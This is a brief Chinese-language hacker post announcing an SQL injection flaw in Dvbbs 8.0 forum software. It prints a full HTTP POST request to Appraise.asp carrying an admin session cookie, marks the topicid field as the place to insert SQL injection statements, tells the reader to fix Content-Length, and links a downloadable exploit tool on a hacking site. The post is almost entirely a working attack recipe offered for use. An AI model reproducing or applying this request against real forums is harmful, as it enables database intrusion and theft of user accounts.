|
动网8.0sql最新注入漏洞+利用工具 POST /Appraise.asp?action=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://bbs.xxx.com... eplyID=5&skin=1 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: bbs.xxx.com Content-Length: 163 Connection: Keep-Alive Cache-Control: no-cache Cookie: DvForum=userid=1&usercookies=0&userclass=%B9%DC%C0%ED%D4%B1&username=admin&userhidden=2&password=r84y6115O3q4tPFJ&StatUserID=4419358; w0802=21; rtime=0; ltime=1183993930108; w08_eid=70836889-http%3A//bbs.xxx.com/index.asp%3Fboardid%3D2; ASPSESSI; upNum=0; geturl=%2Fdispbbs%2Easp%3Fboardid%3D2%26ID%3D2%26replyID%3D2%26skin%3D1; Dvbbs=ciffahcie boardid=2&announceid=5&atype=0&a1=0&a2=0&atitle=thenines&acodestr=3361&ac&topicid=41(这里就加sql注入语句啦)
别忘记修改Content-Length
注:工具下载地址http://www.hackerspirit.com/attachments/month_0708/72007815131341.rar
|
|